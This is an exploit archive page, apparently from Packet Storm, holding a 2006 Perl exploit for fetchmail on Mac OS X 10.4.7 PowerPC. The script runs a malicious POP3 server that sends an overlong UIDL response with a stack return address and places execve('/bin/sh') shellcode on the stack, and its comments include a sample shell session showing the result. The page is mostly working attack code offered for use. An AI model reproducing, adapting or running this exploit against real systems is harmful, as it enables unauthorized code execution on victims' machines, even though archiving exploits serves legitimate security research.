Twenty Year Anniversary

getpwnedmail-ppc.pl.txt

getpwnedmail-ppc.pl.txt
Posted Aug 17, 2006
Authored by Kevin Finisterre | Site digitalmunition.com

Exploit for fetchmail on Mac OSX versions 10.4.7 and below on the PPC architecture.

tags | exploit, ppc
systems | apple
MD5 | 752760949c1d758357649064c5823cb1

getpwnedmail-ppc.pl.txt

Change Mirror Download
#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright (c) 1999 David Nicol <davidnicol@acm.org>
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
# Enter password for kfinisterre@localhost:
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704

use Socket;
use IO::Handle;
use IO::Socket;

$banner = "fetchmail ppc exploit - OSX 10.4.7 8J135";
$sc = "iiii" x 10 .
# * PPC MacOS X shellcode
# * ghandi <ghandi@mindless.com>
"\x7c\xa5\x2a\x79" . # /* xor. r5, r5, r5 ; r5 = NULL */
"\x40\xa2\xff\xfd" . # /* bnel shellcode */
"\x7f\xe8\x02\xa6" . # /* mflr r31 */
"\x3b\xff\x01\x30" . # /* addi r31, r31, 268+36 */
"\x38\x7f\xfe\xf4" . # /* addi r3, r31, -268 ; r3 = path */
"\x90\x61\xff\xf8" . # /* stw r3, -8(r1) ; argv[0] = path */
"\x90\xa1\xff\xfc" . # /* stw r5, -4(r1) ; argv[1] = NULL */
"\x38\x81\xff\xf8" . # /* subi r4, r1, 8 ; r4 = {path, 0} */
"\x3b\xc0\x76\x01" . # /* li r30, 30209 */
"\x7f\xc0\x4e\x70" . # /* srawi r0, r30, 9 */
"\x44\xff\xff\x02" . # /* sc ; execve(r3, r4, r5) */
"/bin/sh";

$eip = 0xbfffd238; # No NX to worry about so just hop right on into the stack.

$malstr = "A" x 196 . pack('l', $eip) x 2;

$PortNumber = 1234;
$door = IO::Socket::INET->new( Proto=>'tcp', LocalPort=>$PortNumber, Listen=>SOMAXCONN, Reuse=>1 );
die "Cannot set up socket: $!" unless $door;

$timeout = 60;
$SIG{ALRM} = sub { die "alarm or timeout\n" };

print "open a new window and type - \"/usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234\"\n";
print "choose any password and press enter\n";
for(;;)
{
until( $client = $door->accept())
{
sleep 1;
};
$F = fork;
die "Fork weirdness: $!" if $F < 0;

if($F)
{
close $client;
next;
};

close ($door);

$client->autoflush();
&AUTHORIZATION;
&TRANSACTION;
exit;
};

sub OK($)
{
my $A = shift;
$A =~ s/\s+\Z//g;
print $client "+OK $A\r\n";
alarm $timeout;
};

sub ERR($)
{
my $A = shift;
$A =~ s/\s+/ /g;
$A =~ s/\s+\Z//g;
print $client "-ERR $A\r\n";
alarm $timeout;
};

sub AUTHORIZATION
{
$Name = '';
OK "$banner";
NEEDUSER:
$Data = <$client>;
($Name) = $Data =~ m/^user (\w+)/i;
unless($Name)
{
ERR "The itsy bitsy spider walked up the water spout";
die if ++$strikes > 5;
goto NEEDUSER;
};
OK "User name ($Name) ok. Password, please.";
$Data = <$client>;
my($Pass) = $Data =~ m/^pass (.*)/i;
$Pass =~ s/\s+\Z//g;

OK "$Name has " . 8 . " messages";
};

sub TRANSACTION
{
%deletia = ();
START:
$_ = $Data = <$client>;
unless(defined($Data))
{
print "Client closed connection\n";
exit;
};
if (m/^STAT/i){ &STAT; goto START};
if (m/^UIDL/i){ &UIDL; goto START};

# Just cram the shellcode onto the stack...
ERR "Welcome to Pwndertino ! $sc";

goto START;
}

sub STAT
{
alarm 0;
$mm = 0;
$nn = scalar(@Messages);
foreach $M (@Messages){
$mm += -s "$M";
};
OK "8 7035";
};

sub List($)
{
my $M = $Messages[$_[0]-1];
return if $deletia{$M};
print $client $_[0],' ',(-s $M)."\r\n";
alarm $timeout;
};

sub UIDL
{
print "Sending exploit string\n";
OK "1 " . $malstr;
};




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close